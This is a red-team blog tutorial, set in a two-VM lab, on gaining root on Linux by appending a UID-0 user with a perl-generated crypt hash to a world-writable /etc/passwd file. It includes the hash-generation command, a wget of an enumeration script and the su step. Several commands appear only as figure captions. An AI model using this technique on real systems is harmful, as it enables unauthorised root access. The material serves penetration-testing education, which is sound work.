Linux Privilege Escalation via writeable /etc/passwd file


exploit /etc/passwd for Linux Privilege Escalation via writeable passwd file
During the Red Team assessment, a Red Teamer faces many scenarios and one of the scenarios is a normal level shell or a low privilege shell. In the Windows environment, the Administrator or a member of Administrator has the high privileges and mostly the target is a high-end user. Similarly, In Linux environment root user or the user with sudo privileges are the most targeted one.

In this blog, we will be discussing about file misconfiguration which then leads to privilege escalation. Generally, during solving CTF, we always look at the passwd file to have an idea of the users available on the system.

The passwd file is present at the /etc directory of the Linux root. The most important thing to note is that this file can be accessed by an unprivileged user.

/etc/passwd

/etc/passwd file is used to keep track of every registered user that has access to a system. It is a colon-separated file that contains the following information in sequence:-
  • User Name
  • Encrypted Password
  • User ID (or UID)
  • Group ID (or GUID)
  • Full Name of the User
  • User Home Directory
  • Login Shell

Now, we will look at the /etc/passwd file: –
linux-passwd-file


Let’s have a detailed look at the “/etc/passwd” file, taking the root user as an example: –
  • root: Username
  • x: Placed for the User Password. The password is directly obtained from “/etc/shadow” file.
  • 0: UID of the root user.
  • 0: GID of the root user.
  • root: Placeholder for user description.
  • /root: Home Directory for the user. The user will be presented with this directory in a terminal session.
  • /bin/bash: User’s shell. Depending upon the user purpose, this shell would be spawned when the user logs on.

Environment Setup: –
Two Linux boxes with the following OS configurations set-ted up in VM with NAT Network mode (used to share host’s IP Address).
OS NameRoleOS VersionMachine IPKernel Version
Kali Linux (x64 bit)Attacker MachineKali192.168.245.1344.12.0-kali2-686
Ubuntu (x64 bit)Vulnerable MachineUbuntu 14.04.6 LTS192.168.245.1464.4.0-142-generic
Figure: OS Configuration

We are assuming that we have an initial foothold with hacknpentest user of the target system on our attacker machine (kali box). Now, we will upload linuxprivchecker.py python script to have a look at the misconfigurations at the target system.

We are using the wget (or web get) utility to download a file to the target server.
enumeration script to target server
Figure: Downloading enumeration script to the target server.
By default, Python is installed on all linux machine. We will use the following command to run the enumeration script.
python linuxprivchecker.py
Running the exploit
Figure: Running the script

Carefully looking at the script output, we found out that passwd file is world writeable that is have read, write and modify permissions to a normal user.
exploit /etc/passwd for privilege escalation
Figure: Misconfigured Permissions on Passwd file

Permission misconfigurations could be abused in a way that it leads to the escalation of current user privileges to root user. We will now try to write into the passwd file to make our way to root.

We will add a user to the passwd file explicitly giving the encrypted password in the respected fields. One can use perl language to generate an encrypted password with salt as follows:


The following command will add a user with the encrypted password and UID, GID set to root [0] to the passwd file.


Let’s discuss about the fields we are going to add to the passwd file.

Tom: Name of the User.
ad7t5uIalqMws: Encrypted User Password.
0: UserID of root.
0: GroupID of root.
User_like_root: User Description
/root: Home Directory for the User.
/bin/bash: User’s Shell

‘>>’ sign redirects output to a file appending the redirected output at the end (here /etc/passwd file).
Now, let’s make our way to root!
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
Generating encrypted password
Figure: Generating encrypted password

The above command will generate a hash with the following password and salt:-
Original Password: Password@973
Salt: addedsalt
Encrypted Password: ad7t5uIalqMws

With the above encrypted password, let’s now append the following to /etc/passwd file.

Appending to passwd file
Figure: Appending to passwd file

The Tom user is successfully appended to /etc/passwd file.
cat /etc/passwd
User Added to passwd file
Figure: User Added to passwd file

Now using su command we will try to login with Tom user.
su-must-be run-from-terminal

Oops!! We don’t have a proper terminal, we will migrate to bash shell using the following python one liner (python is installed on the target server): –
python-exploit-execution
Figure: Migrating to stable shell

Now, we try to login with Tom user using the following command: –
 And BOOM!! we are able to login with root privileges ????.
gain-root-shell
Figure: Escalated our privileges to root!

We had found permission misconfiguration on the passwd file, leveraging this we have made our way to login as root user.  In the next blog post, we will be discussing about various other methods for Linux privilege escalation.

Till then hacknpentest!!!